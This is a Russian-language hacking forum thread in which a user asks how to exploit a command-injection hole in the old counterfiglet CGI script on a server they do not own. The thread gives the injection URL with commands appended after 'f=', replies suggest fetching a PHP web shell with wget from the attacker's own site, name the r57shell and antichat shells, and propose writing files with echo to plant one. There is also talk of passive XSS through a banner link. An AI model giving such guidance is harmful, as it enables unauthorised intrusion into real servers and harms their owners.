Дыра cgi-bin/counterfiglet....
 

Нашёл дыру на одном сервере вот такого типа: cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id...
Прочитал об этой дыре много... С её помошью можно залить на сервак Shell... Проблема в том что сам Shell найти немогу. Нашёл когдато здесь на форуме PHP сплойт под эту дыру, а скомпилить неполучается... Да даже дело не в скомпилить, просто я её поошибке затёр. И сейчас немогу найти его.Помоему инекция конкретно работает с этой дырой. Вообщем: Помогите мне воспользоватся этой дырой, своими советами и подсказками. Shell бы тоже непомишал. Или на худой конец помогите найти здесь на форуме Php сплойт для данной дыры.

ты команды можешь исполнять что еще тебе надо?

wget yoursite.com/shell.php
а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате

А поподобнее можно...

Напиши плз. как правелно залить r57shell.

Для начало тебе нужна папка с правами на запись.
Если разрешенно записывать в папку с самим cgi скриптом то туда надо закинуть cgi shell.
Вообще определись что тебе попробуй команды типо echо 123>123.php а вообще можно полноценно лазить как через шелл... просто исполняя команды так...
2n0ne
Гениально :)

А если без шелла. Как найти команды которые он будет воспринимать?

все команды nix систем..
Если там nix...

Ради интереса вбил в поисковик counterfiglet нашел вот это http://herurg.chat.ru/counterfiglet.txt . Внимания заслуживает дата 1995

[ cash ], уху)) я такой :D

Автор, после "f=" пишешь команду)
попробуй "ls -la" без кавычек, ответ есть?
и если, как ты написал, тебе сервер не отвечает, с чего ты взял что ты можешь там что-то исполнять?))

1.Может дадите ссылку где можно почитать про интерпритацию команд! Какие действия выполняет конкретная команда?
2. Нашёл ссылку такого плана если быть точным то это кнопка: <a href="[адрес сайта]l=1&i=31587" target=_blank><img src="[адрес сайта]/f.gif" border=0 width=88 height=31 title="Бла-бла-бла" alt="Бла-бла-бла"></a>
Могу ли я через неё юзать Shell?

млять ми под сталом.
2vipklient
нет не можешь...

Ок... Чё столько эмоций я непойму. Это вроде форум и я просто спрашиваю у знающих людей. Иначе зачем тогда нужен форум?! Просто если б каждый отвечал нормально на вопрос с пояснением хотя бынебольшим так было бы проще и мне и вам. Я бы поскорее разобрался и незадавал бы, как вам кажется, глупые вопросы. Я быстро учусь) все мы были чайниками когдато но научились же)

Может я неверно выразился. Я имел ввиду: в ссылку на данную кнопку я могу подставить адрес на свой сайт где лежит шел и что б он работал не смоим сайтом а с выше упомянутым. Или только могу её использовать для пасивного Xss?

Не обижайся но выучи для начала хотя Html разметку, надо все же знать какие то азы.